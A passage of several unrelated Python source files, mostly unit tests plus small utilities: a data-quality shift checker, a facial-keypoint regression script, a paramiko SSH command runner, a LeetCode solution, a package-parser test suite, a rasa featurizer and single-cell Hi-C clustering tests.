self.assertEqual(round(explanations[1].diff, 2), 0.67)
self.assertEqual(round(explanations[2].val1, 2), 1.13)
self.assertEqual(round(explanations[2].val2, 2), 1.89)
self.assertEqual(round(explanations[2].diff, 2), 0.67)
with self.subTest('no analyzer should detect shift'):
self.check = DQMetricsCheck(mean_threshold=.3, value_range_threshold=.68, std_threshold=.7,
categorical_threshold=.25)
report = self.check.run(self.store_num)
self.assertEqual(report.shifted_columns, [])
with self.subTest('only std should detect shift'):
self.check = DQMetricsCheck(mean_threshold=.3, value_range_threshold=.68, std_threshold=.5,
categorical_threshold=.25)
report = self.check.run(self.store_num)
explanations = report.explanation['numerical_categorical']['cool_numbers']
self.assertEqual(len(explanations), 1)
self.assertEqual(round(explanations[0].val1, 2), 1.13)
self.assertEqual(round(explanations[0].val2, 2), 1.89)
self.assertEqual(round(explanations[0].diff, 2), 0.67)
def test_run_categorical(self):
with self.subTest("Test precalculation"):
report = self.check.run(self.store)
with self.subTest("Test shifted categorical columns"):
self.assertEqual(report.shifted_columns, ['shift'])
self.assertCountEqual(report.examined_columns, ['shift', 'no_shift'])
shift_explanation = report.explanation['attribute_val']['shift'][0]
self.assertEqual(shift_explanation.val1, 1.0)
self.assertEqual(shift_explanation.val2, 0)
self.assertEqual(shift_explanation.diff, 1.0)
def test_relative_metric_difference(self):
with self.subTest('Normal case'):
self.check.data = {'numerical_comparison': {'column': {'metric_name': {'df1': 10.0, 'df2': 5.0}}}}
self.assertEqual(self.check.relative_metric_difference('column', 'metric_name')[2], -.5)
self.check.data = {'numerical_comparison': {'column': {'metric_name': {'df1': 1.2, 'df2': 12.0}}}}
self.assertEqual(self.check.relative_metric_difference('column', 'metric_name')[2], 9.0)
with self.subTest('Both values zero'):
self.check.data = {'numerical_comparison': {'column': {'metric_name': {'df1': 0, 'df2': 0}}}}
self.assertEqual(self.check.relative_metric_difference('column', 'metric_name')[2], 0)
with self.subTest('Value in df1 zero'):
self.check.data = {'numerical_comparison': {'column': {'metric_name': {'df1': 0, 'df2': 12.4}}}}
self.assertEqual(self.check.relative_metric_difference('column', 'metric_name')[2], 0)
@mock.patch('shift_detector.checks.dq_metrics_check.plt')
def test_numerical_plots_work(self, mock_plt):
self.assertFalse(mock_plt.figure.called)
report = self.check.run(self.store)
custom_plot_numerical = report.numerical_plot(DataFrame([1, 2, 3]), DataFrame([4, 5, 6]))
custom_plot_numerical()
self.assertTrue(mock_plt.figure.called)
self.assertTrue(mock_plt.figure().add_subplot.called)
self.assertTrue(mock_plt.show.called)
@mock.patch('shift_detector.checks.dq_metrics_check.plt')
def test_categorical_plots_work(self, mock_plt):
self.assertFalse(mock_plt.figure.called)
report = self.check.run(self.store)
custom_plot_categorical = report.attribute_val_plot([([1, 2, 3], [2, 4, 6], ['Heinz', 'Peter', 'Rudolf'],
'A very important plot')])
custom_plot_categorical()
self.assertTrue(mock_plt.figure.called)
self.assertTrue(mock_plt.figure().add_subplot.called)
self.assertTrue(mock_plt.show.called)
|
from typing import Union, List, Any, Optional, Tuple
import numpy as np
from dataclasses import dataclass
@dataclass
class GPVExample:
"""Data representation that can be passed to GPV `collate` functions
This representation puts the "raw" input examples for various tasks into a universal format
so examples from different task can be jointly processed, and may encompass some pre-processing,
like deciding what queries to use for an example, or tokenizing the text
"""
"""ID for this example that is unique among all datasets"""
id: str
"""Image this is for"""
image_id: Union[str, int]
"""Query (or list of queries) that can be used for this example, possibly tokenized"""
query: Union[str, List[str], List[np.ndarray]]
"""Query for deciding which boxes are relevant, used by some models to compute box ranking"""
relevance_query: Optional[str] = None
"""Crop of the image to use, in [x, y, h, w] form"""
crop: Optional[Tuple[float, float, float, float]] = None
"""Optional array of boxes that are part of the query in [x, y, w, h] form"""
query_boxes: np.ndarray = None
"""Boxes to predict for this query, if there are any, in [x, y, h, w] form"""
target_boxes: Optional[np.ndarray] = None
"""Text to learn to generate for this example, if there is any"""
target_text: Optional[Any] = None
index_of_class: Optional[str] = None
correct_answer: Optional[str] = None
"""Meta-data about this example"""
meta: Any = None
def get_gpv_id(self):
return self.id
|
import os
import cv2
import numpy as np
import pandas as pd
from PIL import Image
from sklearn.decomposition import PCA
from sklearn.tree import DecisionTreeRegressor
from randomforest import Forest
def impute_NaNs(dataframe):
for key in dataframe:
if key != 'Image':
dataframe[key].fillna(dataframe[key].mean(), inplace = True)
return dataframe
def hist_equalize(img, num_bins = 256):
hist, bins = np.histogram(img.flatten(), num_bins, normed = True)
cdf = hist.cumsum()
cdf = (cdf / cdf[-1]) * 255.
out_img = np.interp(img.flatten(), bins[:-1], cdf)
out_img = out_img.reshape(img.shape)
return out_img
def mirror_data(img_data, lab_data, img_h = 96, img_w = 96):
out_img_data = np.copy(img_data)
out_lab_data = np.copy(lab_data)
out_img_data = out_img_data.reshape(-1, img_h, img_w)
if np.random.rand() < 1:
# Vertical flip
out_img_data = out_img_data[:, ::-1]
out_lab_data[:, 1::2] = img_h - out_lab_data[:, 1::2]
else:
# Horizontal flip
out_img_data = out_img_data[:, :, ::-1]
out_lab_data[:, 0::2] = img_w - out_lab_data[:, 0::2]
out_img_data = out_img_data.reshape(-1, img_h * img_w)
return (out_img_data, out_lab_data)
def load_data(filepath, mode = 'train', preprocess_flag = True, normalize_flag = False):
print('Load started with mode {}'.format(mode))
dataframe = pd.read_csv(filepath, header = 0)
if mode == 'train':
print('Handling NaNs...')
if preprocess_flag:
dataframe = impute_NaNs(dataframe)
else:
dataframe = dataframe.dropna()
img_data = dataframe['Image'].apply(lambda im: np.fromstring(im, sep = ' '))
img_data = np.vstack(img_data.values).astype(np.float32)
if preprocess_flag:
print('Equalizing histograms...')
for idx in range(len(img_data)):
img_data[idx] = hist_equalize(img_data[idx])
if normalize_flag:
print('Normalizing data...')
img_data -= np.mean(img_data, axis = 0)
img_data /= np.std(img_data, axis = 0)
if mode == 'train':
lab_data = dataframe.drop(['Image'], axis = 1)
lab_data = lab_data.values.astype(np.float32)
if preprocess_flag:
print('Performing data augmentation...')
img_data_aug, lab_data_aug = mirror_data(img_data, lab_data)
img_data = np.vstack((img_data, img_data_aug))
lab_data = np.vstack((lab_data, lab_data_aug))
else:
lab_data = None
print('Load completed with mode {}'.format(mode))
return (img_data, lab_data)
def display(img_data, lab_data, img_h = 96, img_w = 96):
num_points = int(len(lab_data[0]) / 2)
img_data = img_data.reshape(-1, img_h, img_w)
color = (0, 0, 255)
for img, lab in zip(img_data, lab_data):
img = img.astype(np.uint8)
test = Image.fromarray(img)
img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)
for idx in range(num_points):
x, y = int(lab[idx * 2]), int(lab[idx * 2 + 1])
cv2.putText(img, str(idx), (x, y), cv2.FONT_HERSHEY_SIMPLEX, 0.25, color, 1)
img = img[:, :, ::-1]
img = Image.fromarray(img)
img.show()
input('Enter any key...')
def main():
np.random.seed(1)
print('Loading data...')
train_data = load_data('./kaggle_data/training.csv', mode = 'train', preprocess_flag = False)
test_data = load_data('./kaggle_data/test.csv', mode = 'test', preprocess_flag = False)
X_train, Y_train = train_data[0], train_data[1]
X_test, _ = test_data[0], test_data[1]
inp_data = np.copy(X_test)
print('Performing PCA...')
pca = PCA(n_components = 23, svd_solver='randomized')
pca.fit(X_train)
X_train = pca.fit_transform(X_train)
X_test = pca.fit_transform(X_test)
print('Creating Random Forest Regressor...')
# Uncomment to try sklearn's decision tree regressor
# regressor = DecisionTreeRegressor(max_depth = 10)
# regressor.fit(X_train, Y_train)
regressor = Forest(num_trees = 1, mode = 'regression')
regressor.fit(X_train, Y_train)
print('Generating test predictions...')
Y_test = regressor.predict(X_test)
display(inp_data[-10:], Y_test[-10:])
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import sys
import os
import paramiko
class sshcmd():
def __init__(self, server, username, password, port=22,
hostkey_file="~/.ssh/known_hosts",
mode="pwd", pkey_file="~/.ssh/id_rsa", debug=False):
'''
mode: "pwd" or "rsa"
pkey_file: valid if mode is "rsa"
'''
if debug:
paramiko.common.logging.basicConfig(level=paramiko.common.DEBUG)
hostkey_file = os.path.expanduser(hostkey_file)
self.ssh = paramiko.SSHClient()
self.ssh.load_system_host_keys(hostkey_file)
#
if mode == "rsa":
pkey_file = os.path.expanduser(pkey_file)
pkey = paramiko.RSAKey.from_private_key_file(pkey_file,
password=password)
self.ssh.connect(server, port=port,
username=username,
pkey=pkey,
allow_agent=False,
timeout=15, auth_timeout=15)
elif mode == "pwd":
self.ssh.connect(server, port=port,
username=username,
password=password,
allow_agent=False,
timeout=15, auth_timeout=15)
else:
raise Exception("ERROR: invalid mode %s" % mode)
def execcmd(self, cmd):
return self.ssh.exec_command(cmd)
def close(self):
return self.ssh.close()
if __name__ == "__main__" :
if len(sys.argv) < 5:
print("Usage: %s (server) (username) (password) (cmd...)" %
(sys.argv[0]))
exit(1)
#
server = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
#
ssh = sshcmd(server, username, password, debug=True)
ssh_stdin, ssh_stdout, ssh_stderr = ssh.execcmd("".join(sys.argv[4:]))
#
print("STDIN:", type(ssh_stdin))
print("STDOUT:", type(ssh_stdout))
print("STDERR:", type(ssh_stderr))
print("====")
#
for line in ssh_stdout:
print(line.rstrip())
#
ssh.close()
|
from typing import List
#
# @lc app=leetcode id=682 lang=python3
#
# [682] Baseball Game
#
# @lc code=start
class Solution:
def calPoints(self, ops: List[str]) -> int:
result: List[int] = []
for s in ops:
if s == "C":
result.pop()
elif s == "+":
s1 = result.pop()
s2 = result.pop()
result.append(s2)
result.append(s1)
result.append(s1 + s2)
elif s == "D":
s1 = result.pop()
result.append(s1)
result.append(s1 * 2)
else:
result.append(int(s))
return sum(result)
# @lc code=end
if __name__ == "__main__":
s = Solution()
ops = ["5", "-2", "4", "C", "D", "9", "+", "+"]
print(s.calPoints(ops))
|
from ebl.corpus.domain.chapter import make_title
from ebl.transliteration.domain.markup import StringPart
from ebl.transliteration.domain.translation_line import TranslationLine
TRANSLATION = (
TranslationLine([StringPart("not the title")], "de"),
TranslationLine([StringPart("the title,")], "en"),
)
def test_make_title() -> None:
assert make_title(TRANSLATION) == (StringPart("The Title"),)
|
"""
@author: TD gang
Set of class that override basic class like dict
to add specific behaviour
"""
from __future__ import annotations
import copy
from typing import TYPE_CHECKING, Any
# Forward references
if TYPE_CHECKING:
from silex_client.action.action_query import ActionQuery
class ReadOnlyError(Exception):
"""
Simple exception for the readonly datatypes
"""
pass
class ReadOnlyDict(dict):
"""
Pointer to an editable dict. It allows to read its data but not to edit it
"""
@staticmethod
def __readonly__(*args, **kwargs) -> None:
raise ReadOnlyError("This dictionary is readonly")
def __copy__(self) -> ReadOnlyDict:
cls = self.__class__
return cls(copy.copy(dict(self)))
def __deepcopy__(self, memo) -> ReadOnlyDict:
cls = self.__class__
return cls(copy.deepcopy(dict(self), memo))
__setitem__ = __readonly__
__delitem__ = __readonly__
pop = __readonly__
clear = __readonly__
update = __readonly__
class CommandOutput(str):
"""
Helper to differenciate the strings from the command_output
"""
def __init__(self, *args, **kwargs):
super().__init__()
splited_path = self.split(":")
# Initialize attrubutes
self.step = None
self.command = splited_path[0]
self.output_keys = []
# If the user specified more that just the command name
if len(splited_path) > 1:
# Get the step and the command
self.command = splited_path[1]
self.step = splited_path[0]
# The output keys are in case the command returns a dict
# The user can get a particular value in the dict
for key in splited_path[2:]:
self.output_keys.append(key)
def get_command_path(self):
"""
Get the path to get the command with the method ActionQuery::get_command
"""
if self.step is not None:
return f"{self.step}:{self.command}"
return self.command
def rebuild(self) -> CommandOutput:
"""
Since strings a immutable, when modifying the step or command attrubutes
We need to rebuild entirely the string.
TODO: Recreate a class that contains a string instead of inheriting from it,
we let this for now to keep string features like json serialisability,
but it is not ideal
"""
return CommandOutput(":".join([self.get_command_path(), *self.output_keys]))
def get_value(self, action_query: ActionQuery) -> Any:
"""
Get the actual returned value of the command this path is pointing to
"""
command = action_query.get_command(self.get_command_path())
value = command.output_result if command is not None else None
for key in self.output_keys:
if isinstance(value, dict):
value = value.get(key, {})
if isinstance(value, CommandOutput):
return value.get_value(action_query)
return value
|
#!/usr/bin/env python3
#
# Copyright (C) 2016 Dmitry Marakasov <amdmi3@amdmi3.ru>
#
# This file is part of repology
#
# repology is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# repology is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with repology. If not, see <http://www.gnu.org/licenses/>.
import unittest
import repology.config
from repology.package import Package
from repology.repoman import RepositoryManager
class TestParsers(unittest.TestCase):
def setUp(self):
self.maxDiff = None
repoman = RepositoryManager(repology.config.REPOS_DIR, 'testdata')
self.packages = repoman.ParseMulti(reponames=['have_testdata'])
def check_package(self, name, reference):
reference_with_default = {
# repo must be filled
# family must be filled
'subrepo': None,
# name must be filled
'effname': None,
# version must be filled
'origversion': None,
'effversion': None,
'versionclass': None,
'maintainers': [],
'category': None,
'comment': None,
'homepage': None,
'licenses': [],
'downloads': [],
'ignore': False,
'shadow': False,
'ignoreversion': False,
'extrafields': {},
}
reference_with_default.update(reference)
def sort_lists(what):
output = {}
for key, value in what.items():
if isinstance(value, list):
output[key] = sorted(value)
else:
output[key] = value
return output
for package in self.packages:
if package.name == name:
self.assertEqual(
sort_lists(package.__dict__),
sort_lists(reference_with_default)
)
return
self.assertFalse('package not found')
def test_freebsd(self):
self.check_package(
'vorbis-tools',
{
'repo': 'freebsd',
'family': 'freebsd',
'name': 'vorbis-tools',
'version': '1.4.0',
'origversion': '1.4.0_10,3',
'category': 'audio',
'comment': 'Play, encode, and manage Ogg Vorbis files',
'maintainers': ['naddy@freebsd.org'],
'homepage': 'http://www.vorbis.com/',
'extrafields': {
'portname': 'vorbis-tools',
'origin': 'audio/vorbis-tools',
}
}
)
def test_gentoo(self):
self.check_package(
'chromium-bsu',
{
'repo': 'gentoo',
'family': 'gentoo',
'name': 'chromium-bsu',
'version': '0.9.15.1',
'origversion': None,
'category': 'games-action',
'maintainers': ['games@gentoo.org'],
'homepage': 'http://chromium-bsu.sourceforge.net/',
'comment': 'Chromium B.S.U. - an arcade game',
'downloads': ['mirror://sourceforge/chromium-bsu/chromium-bsu-0.9.15.1.tar.gz'],
'licenses': ['Clarified-Artistic'],
}
)
self.check_package(
'asciinema',
{
'repo': 'gentoo',
'family': 'gentoo',
'name': 'asciinema',
'version': '1.3.0',
'origversion': None,
'category': 'app-misc',
'maintainers': ['kensington@gentoo.org'],
'homepage': 'https://asciinema.org/', # ['https://asciinema.org/', 'https://pypi.python.org/pypi/asciinema']
'comment': 'Command line recorder for asciinema.org service',
'downloads': ['https://github.com/asciinema/asciinema/archive/v1.3.0.tar.gz'],
'licenses': ['GPL-3+'],
}
)
self.check_package(
'away',
{
'repo': 'gentoo',
'family': 'gentoo',
'name': 'away',
'version': '0.9.5',
'origversion': '0.9.5-r1',
'category': 'app-misc',
'maintainers': ['maintainer-needed@gentoo.org'], # note this is generated by repoman form repo config
'homepage': 'http://unbeatenpath.net/software/away/',
'comment': 'Terminal locking program with few additional features',
'downloads': ['http://unbeatenpath.net/software/away/away-0.9.5.tar.bz2'],
'licenses': ['GPL-2'],
}
)
self.check_package(
'aspell',
{
'repo': 'gentoo',
'family': 'gentoo',
'name': 'aspell',
'version': '0.60.7_rc1',
'category': 'app-test',
'maintainers': ['maintainer-needed@gentoo.org'], # note this is generated by repoman form repo config
'homepage': 'http://aspell.net/',
'comment': 'A spell checker replacement for ispell',
'downloads': ['mirror://gnu-alpha/aspell/aspell-0.60.7-rc1.tar.gz'],
'licenses': ['LGPL-2'],
}
)
def test_arch(self):
self.check_package(
'zlib',
{
'repo': 'arch',
'family': 'arch',
'subrepo': 'core',
'name': 'zlib',
'version': '1.2.8',
'origversion': '1:1.2.8-7',
'comment': 'Compression library implementing the deflate compression method found in gzip and PKZIP',
'homepage': 'http://www.zlib.net/',
'licenses': ['custom'],
'maintainers': ['pierre@archlinux.de'],
}
)
def test_cpan(self):
self.check_package(
'Acme-Brainfuck',
{
'repo': 'cpan',
'family': 'cpan',
'name': 'Acme-Brainfuck',
'version': '1.1.1',
'maintainers': ['jaldhar@cpan'],
'homepage': 'http://search.cpan.org/dist/Acme-Brainfuck/',
'shadow': True,
}
)
def test_debian(self):
self.check_package(
'a52dec',
{
'repo': 'debian_unstable',
'subrepo': 'main',
'category': 'devel',
'family': 'debuntu',
'name': 'a52dec',
'version': '0.7.4',
'origversion': '0.7.4-18',
'maintainers': [
'pkg-multimedia-maintainers@lists.alioth.debian.org',
'dmitrij.ledkov@ubuntu.com',
'sam+deb@zoy.org',
'siretart@tauware.de',
],
'homepage': 'http://liba52.sourceforge.net/',
}
)
def test_gobolinux(self):
self.check_package(
'AutoFS',
{
'repo': 'gobolinux',
'family': 'gobolinux',
'name': 'AutoFS',
'version': '5.0.5',
'comment': 'Automounting daemon',
'homepage': 'ftp://ftp.kernel.org/pub/linux/daemons/autofs/',
'downloads': [
'http://www.kernel.org/pub/linux/daemons/autofs/v5/autofs-5.0.5.tar.bz2'
],
'licenses': ['GNU General Public License (GPL)'],
'maintainers': ['fallback-maintainer-gobolinux@repology'] # note this is generated by repoman
}
)
def test_slackbuilds(self):
# multiline DOWNLOAD
self.check_package(
'virtualbox',
{
'repo': 'slackbuilds',
'family': 'slackbuilds',
'name': 'virtualbox',
'version': '5.0.30',
'category': 'system',
'homepage': 'http://www.virtualbox.org/',
'downloads': [
'http://download.virtualbox.org/virtualbox/5.0.30/SDKRef.pdf',
'http://download.virtualbox.org/virtualbox/5.0.30/UserManual.pdf',
'http://download.virtualbox.org/virtualbox/5.0.30/VBoxGuestAdditions_5.0.30.iso',
'http://download.virtualbox.org/virtualbox/5.0.30/VirtualBox-5.0.30.tar.bz2',
],
'maintainers': ['pprkut@liwjatan.at'],
}
)
# different DOWNLOAD and DOWNLOAD_x86_64
self.check_package(
'baudline',
{
'repo': 'slackbuilds',
'family': 'slackbuilds',
'name': 'baudline',
'version': '1.08',
'category': 'ham',
'homepage': 'http://www.baudline.com/',
'downloads': [
'http://www.baudline.com/baudline_1.08_linux_i686.tar.gz',
'http://www.baudline.com/baudline_1.08_linux_x86_64.tar.gz',
],
'maintainers': ['joshuakwood@gmail.com'],
}
)
# DOWNLOAD_x86_64 is UNSUPPORTED
self.check_package(
'teamviewer',
{
'repo': 'slackbuilds',
'family': 'slackbuilds',
'name': 'teamviewer',
'version': '12.0.76279',
'category': 'network',
'homepage': 'https://www.teamviewer.com/',
'downloads': [
'https://download.teamviewer.com/download/teamviewer_i386.deb',
],
'maintainers': ['willysr@slackbuilds.org'],
}
)
# DOWNLOAD is UNSUPPORTED
self.check_package(
'oracle-xe',
{
'repo': 'slackbuilds',
'family': 'slackbuilds',
'name': 'oracle-xe',
'version': '11.2.0',
'category': 'system',
'homepage': 'http://www.oracle.com/technetwork/database/database-technologies/express-edition/overview/index.html',
'downloads': [
'http://download.oracle.com/otn/linux/oracle11g/xe/oracle-xe-11.2.0-1.0.x86_64.rpm.zip',
],
'maintainers': ['slack.dhabyx@gmail.com'],
}
)
# DOWNLOAD_x86_64 is UNTESTED
self.check_package(
'kforth',
{
'repo': 'slackbuilds',
'family': 'slackbuilds',
'name': 'kforth',
'version': '1.5.2p1',
'category': 'development',
'homepage': 'http://ccreweb.org/software/kforth/kforth.html',
'downloads': [
'ftp://ccreweb.org/software/kforth/linux/kforth-x86-linux-1.5.2.tar.gz',
],
'maintainers': ['gschoen@iinet.net.au'],
}
)
if __name__ == '__main__':
unittest.main()
|
from __future__ import division
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import absolute_import
import logging
import os
import re
from typing import Any, Dict, List, Optional, Text
from rasa_nlu_gao import utils
from rasa_nlu_gao.featurizers import Featurizer
from rasa_nlu_gao.training_data import Message
from rasa_nlu_gao.components import Component
from rasa_nlu_gao.model import Metadata
import numpy as np
logger = logging.getLogger(__name__)
class WordVectorsFeaturizer(Featurizer):
name = "intent_featurizer_wordvector"
provides = ["text_features"]
requires = ["tokens"]
defaults = {
"vector": None,
"elmo": None,
"limit": None
}
@classmethod
def required_packages(cls):
# type: () -> List[Text]
return ["gensim", "numpy", "torch"]
def __init__(self, component_config=None, model=None, category=None):
"""Construct a new count vectorizer using the sklearn framework."""
super(WordVectorsFeaturizer, self).__init__(component_config)
self.model = model
self.category = category
@classmethod
def create(cls, cfg):
component_conf = cfg.for_component(cls.name, cls.defaults)
vector_file = component_conf.get("vector")
elmo_file = component_conf.get("elmo")
if not vector_file and not elmo_file:
raise Exception("The WordVectorsFeaturizer component needs "
"the configuration value either word2vec vector or elmo model.")
if vector_file:
import gensim
model = gensim.models.KeyedVectors.load_word2vec_format(vector_file, binary=False, limit=component_conf.get("limit"))
category = 'word2vec'
elif elmo_file:
from rasa_nlu_gao.models.elmo_cn import Embedder
model = Embedder(elmo_file)
category = 'elmo'
return WordVectorsFeaturizer(component_conf, model, category)
@staticmethod
def _replace_number(text):
return re.sub(r'\b[0-9]+\b', '0', text)
def _chunk_max_pooling(self,data):
import torch
import torch.nn as nn
all_data = np.zeros((len(data), data[0].shape[1]), dtype=np.float32)
for i in range(len(data)):
stride = data[i].shape[0]
m = nn.MaxPool1d(stride, stride)
arr = torch.from_numpy(data[i]).reshape(1, 1, -1)
arr = m(arr)
arr = arr.reshape(1, -1)
all_data[i] = arr[0].data.numpy()
return np.squeeze(all_data)
def _k_max_pooling(self,data):
import torch
all_data = np.zeros((len(data), data[0].shape[1]), dtype=np.float32)
for i in range(len(data)):
arr = torch.from_numpy(data[i]).reshape(-1)
stride = data[i].shape[1]
ind = arr.topk(stride)[1].sort()
all_data[i] = arr[ind[0]].data.numpy()
return np.squeeze(all_data)
def _get_message_text(self, message):
all_tokens = []
all_t=[]
for t in message.get("tokens"):
text = self._replace_number(t.text)
all_t.append(text)
if self.category == 'word2vec':
unk_vec = np.zeros((self.model.vector_size,))
all_tokens.append(unk_vec)
if text in self.model.vocab:
all_tokens.append(self.model[text])
all_tokens = [np.vstack(tuple(all_tokens))]
if self.category == 'elmo':
all_tokens = self.model.sents2elmo([all_t])
single_token = self._k_max_pooling(all_tokens)
return single_token
def train(self, training_data, cfg=None, **kwargs):
tokens_text = [self._get_message_text(example) for example in training_data.intent_examples]
X = np.array(tokens_text)
for i, example in enumerate(training_data.intent_examples):
example.set("text_features", self._combine_with_existing_text_features(example, X[i]))
def process(self, message, **kwargs):
# type: (Message, **Any) -> None
message_text = self._get_message_text(message)
message.set("text_features", self._combine_with_existing_text_features(message, message_text))
@classmethod
def load(cls,
model_dir=None, # type: Text
model_metadata=None, # type: Metadata
cached_component=None, # type: Optional[Component]
**kwargs # type: **Any
):
meta = model_metadata.for_component(cls.name)
if model_dir:
vector_file = meta.get("vector")
elmo_file = meta.get("elmo")
if vector_file:
import gensim
model = gensim.models.KeyedVectors.load_word2vec_format(vector_file, binary=False, limit=meta.get("limit"))
category = 'word2vec'
elif elmo_file:
from rasa_nlu_gao.models.elmo_cn import Embedder
model = Embedder(elmo_file)
category = 'elmo'
return WordVectorsFeaturizer(
component_config=meta,
model=model,
category=category)
else:
logger.warning("Failed to load featurizer. Maybe path {} "
"doesn't exist".format(os.path.abspath(model_dir)))
return WordVectorsFeaturizer(meta)
|
import warnings
warnings.simplefilter(action="ignore", category=RuntimeWarning)
warnings.simplefilter(action="ignore", category=PendingDeprecationWarning)
import pytest
import os
from tempfile import NamedTemporaryFile, mkdtemp
from matplotlib.testing.compare import compare_images
from schicexplorer import scHicClusterMinHash
ROOT = os.path.join(os.path.dirname(os.path.abspath(__file__)), "test-data/")
tolerance = 60
def are_files_equal(file1, file2, delta=2, skip=0):
equal = True
if delta:
mismatches = 0
with open(file1) as textfile1, open(file2) as textfile2:
for i, (x, y) in enumerate(zip(textfile1, textfile2)):
if i < skip:
continue
if x != y:
if delta:
mismatches += 1
if mismatches > delta:
equal = False
break
else:
equal = False
break
return equal
def are_files_equal_clustering(file1, file2, number_of_clusters=3, delta=2, skip=0):
equal = True
if delta:
mismatches = 0
numberOfClusters = set()
with open(file1) as textfile1, open(file2) as textfile2:
for i, (x, y) in enumerate(zip(textfile1, textfile2)):
if i < skip:
continue
x = x.split(' ')
y = y.split(' ')
numberOfClusters.add(y[1])
x[0] = x[0].lstrip('/cells/')
y[0] = y[0].lstrip('/cells/')
if x[0] != y[0]:
if delta:
mismatches += 1
if mismatches > delta:
equal = False
break
else:
equal = False
break
if len(numberOfClusters) == number_of_clusters:
return equal
else:
return False
return equal
def test_kmeans():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {} -dim_pca 100".format(ROOT + 'test_matrix.scool',
3, 'kmeans', outfile.name, 3, 800).split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_kmeans.txt", outfile.name)
def test_agglomerative_ward():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {} --noPCA".format(ROOT + 'test_matrix.scool',
3, 'agglomerative_ward', outfile.name, 3, 800).split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_kmeans.txt", outfile.name)
def test_agglomerative_complete():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {} --noPCA ".format(ROOT + 'test_matrix.scool',
3, 'agglomerative_complete', outfile.name, 3, 800).split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_kmeans.txt", outfile.name)
def test_agglomerative_average():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {} --noPCA ".format(ROOT + 'test_matrix.scool',
3, 'agglomerative_average', outfile.name, 3, 800).split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_kmeans.txt", outfile.name)
def test_agglomerative_single():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {} --noPCA ".format(ROOT + 'test_matrix.scool',
3, 'agglomerative_single', outfile.name, 3, 800).split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_kmeans.txt", outfile.name)
def test_birch():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {} -dim_pca 50".format(ROOT + 'test_matrix.scool',
3, 'birch', outfile.name, 3, 800).split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_kmeans.txt", outfile.name)
def test_spectral():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {}".format(ROOT + 'test_matrix.scool',
3, 'spectral', outfile.name, 2, 800).split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_spectral.txt", outfile.name)
def test_spectral_chromosomes():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {} --chromosomes {} ".format(ROOT + 'test_matrix.scool',
3, 'spectral', outfile.name, 2, 800, "chr1 chr2").split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_spectral_chromosomes.txt", outfile.name)
# some issue with the test data, real world data works fine
@pytest.mark.xfail
def test_kmeans_euclidean():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {} --euclideanModeMinHash ".format(ROOT + 'test_matrix.scool',
3, 'kmeans', outfile.name, 2, 800).split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_kmeans_exact.txt", outfile.name)
# some issue with the test data, real world data works fine
# @pytest.mark.xfail
def test_spectral_euclidean():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile_plot = NamedTemporaryFile(prefix='pca_plot_', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
--outFileName {} -t {} -nh {} --euclideanModeMinHash -csp {} --colorMap {} --dpi {} --fontsize {} --figuresize {} {}".format(ROOT + 'test_matrix.scool',
3, 'spectral', outfile.name, 2, 800, outfile_plot.name,
'tab10', 100, 5, 10, 5).split()
scHicClusterMinHash.main(args)
assert are_files_equal_clustering(ROOT + "scHicClusterMinHash/cluster_spectral_euclidean.txt", outfile.name)
res = compare_images(ROOT + "scHicClusterMinHash/plot_pc1_pc2.png", outfile_plot.name + '.png', tolerance)
assert res is None, res
res = compare_images(ROOT + "scHicClusterMinHash/plot_pc2_pc3.png", outfile_plot.name + '.png', tolerance)
assert res is None, res
def test_kmeans_saveMemory():
outfile = NamedTemporaryFile(suffix='.txt', delete=False)
outfile.close()
args = "--matrix {} --numberOfClusters {} --clusterMethod {} \
